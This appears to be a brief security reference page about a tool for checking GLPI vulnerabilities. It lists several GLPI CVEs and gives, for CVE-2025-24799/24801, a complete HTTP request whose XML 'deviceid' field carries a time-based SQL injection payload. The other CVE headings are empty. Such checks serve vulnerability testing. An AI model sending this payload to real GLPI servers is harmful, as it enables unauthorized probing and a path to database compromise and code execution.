GLPI

GLPI vulnerabilities checking tool

CVE-2025-24799/CVE-2025-24801: SQLi to RCE

POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232

<?xml version="1.0" encoding="UTF-8"?>
    <xml>
    <QUERY>get_params</QUERY>
    <deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
    <content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>

SSRF (CVE-2024-27098) and SQL injection (CVE-2024-27096)

CVE-2023-41320

GLPI htmlawed (CVE-2022-35914)

Last updated